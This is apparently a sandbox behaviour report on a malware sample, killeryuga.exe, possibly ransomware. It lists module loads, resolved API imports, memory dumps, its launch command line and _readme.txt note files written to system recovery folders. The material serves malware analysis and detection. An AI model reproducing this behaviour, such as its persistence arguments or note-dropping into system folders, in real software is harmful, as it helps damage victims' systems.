Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
File Create filename = C:\Config.Msi\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
File Create filename = C:\Recovery\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
File Create filename = C:\System Volume Information\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
File Create filename = C:\Boot\BCD.LOG, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Process #18: killeryuga.exe
1671 7
Information Value
ID #18
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsAutoStart IsNotTask
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:10, Reason: Child Process
Unmonitor End Time: 00:03:41, Reason: Self Terminated
Monitor Duration 00:00:30
OS Process Information
Information Value
PID 0x588
Parent PID 0x780 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x554
0x380
0x300
0x348
0x140
0x268
0x30C
0x308
0x7A8
0x7AC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x009543E8 0x0098374E Marked Executable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040D690, 0x004103C0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00410695 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004425A0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043BFE0 False
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
Threads
Thread 0x554
589 7
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x753612fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75361462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x7536cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x75360e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75361400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75364a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x753635b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x76f5cc89 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Module Load module_name = GDI32.dll, base_address = 0x76a80000 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x76ac4124 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x76ac232e True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x76ac555d True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x76aa138a True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x76a97590 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x76ac439f True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x75beeba1 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e43c71 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x75486c3c True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x7549011a True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x754aed56 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77634100 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x7548b238 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x75493e75 True 1
System Get Time type = System Time, time = 2019-03-24 05:38:58 (UTC) True 1
System Get Time type = Ticks, time = 94661 True 1
System Get Time type = Performance Ctr, time = 14019660373 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
